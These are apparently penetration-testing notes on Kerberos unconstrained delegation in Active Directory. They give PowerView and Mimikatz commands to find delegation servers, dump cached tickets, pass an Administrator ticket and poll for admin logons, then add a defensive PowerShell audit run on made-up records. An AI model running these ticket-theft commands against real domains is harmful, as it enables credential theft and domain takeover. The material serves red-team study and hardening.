UNCONSTRAINED DELEGATION

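Unconstrained delegation can be abused through servers that have it enabled. A server trusted for unconstrained delegation keeps the TGT of each user who authenticates to it.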

Enumerate servers with Unconstrained Delegation

Get-NetComputer -Unconstrained | Select -ExpandProperty name

To use unconstrained delegation on the listed servers to compromise another service, we need admin privileges on those servers.

After gaining admin privileges on the server, export the tickets:

Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'

If you find any TGT for "Administrator", you can "Pass The Ticket" to gain Domain Admin access on the unconstrained delegated server:

Invoke-Mimikatz -Command '"kerberos::ptt <TGT TICKET PATH>"'

If you cannot find any TGT from "Administrator", you can wait for "Administrator" to access the unconstrained delegated server:

Invoke-UserHunter -ComputerName <UNCONSTRAINED DELEGATED SERVER> -Poll 100 -UserName Administrator -Delay 5
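
A defender can check the same exposure from the directory side. The following is an added example, not part of the original notes: it flags non-DC computers with the unconstrained delegation bit set and lists the privileged accounts whose TGTs could be cached there. The function name, the InProtectedUsers field and all sample records are assumptions constructed for illustration.

```powershell
# Added defensive example; the records below are constructed, not real hosts.
# userAccountControl bits (documented AD values):
$TRUSTED_FOR_DELEGATION = 0x80000   # unconstrained delegation enabled
$NOT_DELEGATED          = 0x100000  # "Account is sensitive and cannot be delegated"
$DC_PRIMARY_GROUP       = 516       # Domain Controllers, trusted by design

function Get-DelegationExposure {   # hypothetical helper name
    param(
        [Parameter(Mandatory)] [object[]] $Computers,
        [Parameter(Mandatory)] [object[]] $PrivilegedUsers
    )
    # Non-DC hosts that keep the forwarded TGT of every user who authenticates to them.
    $hosts = @($Computers | Where-Object {
        ($_.UserAccountControl -band $TRUSTED_FOR_DELEGATION) -and
        $_.PrimaryGroupID -ne $DC_PRIMARY_GROUP
    })
    # Privileged accounts whose TGT can still be forwarded to such a host.
    $users = @($PrivilegedUsers | Where-Object {
        -not ($_.UserAccountControl -band $NOT_DELEGATED) -and -not $_.InProtectedUsers
    })
    foreach ($h in $hosts) {
        [pscustomobject]@{
            Host            = $h.Name
            ExposedAccounts = ($users.SamAccountName -join ', ')
            Action          = 'Remove unconstrained delegation; prefer constrained delegation'
        }
    }
}

# Constructed inventory. In a live domain, fill these from the ActiveDirectory module,
# e.g. Get-ADComputer -LDAPFilter '(userAccountControl:1.2.840.113556.1.4.803:=524288)'
#      -Properties userAccountControl, primaryGroupID
$computers = @(
    [pscustomobject]@{ Name = 'DC01';  UserAccountControl = 0x82000; PrimaryGroupID = 516 }
    [pscustomobject]@{ Name = 'WEB01'; UserAccountControl = 0x81000; PrimaryGroupID = 515 }
    [pscustomobject]@{ Name = 'FS01';  UserAccountControl = 0x1000;  PrimaryGroupID = 515 }
)
# InProtectedUsers is a field the caller computes from Protected Users group membership.
$admins = @(
    [pscustomobject]@{ SamAccountName = 'Administrator'; UserAccountControl = 0x200;    InProtectedUsers = $false }
    [pscustomobject]@{ SamAccountName = 'adm-alice';     UserAccountControl = 0x100200; InProtectedUsers = $false }
    [pscustomobject]@{ SamAccountName = 'adm-bob';       UserAccountControl = 0x200;    InProtectedUsers = $true }
)

Get-DelegationExposure -Computers $computers -PrivilegedUsers $admins | Format-Table -AutoSize
```

Accounts marked "sensitive and cannot be delegated" or placed in Protected Users drop out of ExposedAccounts, which is why those two settings are the usual hardening for privileged accounts.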
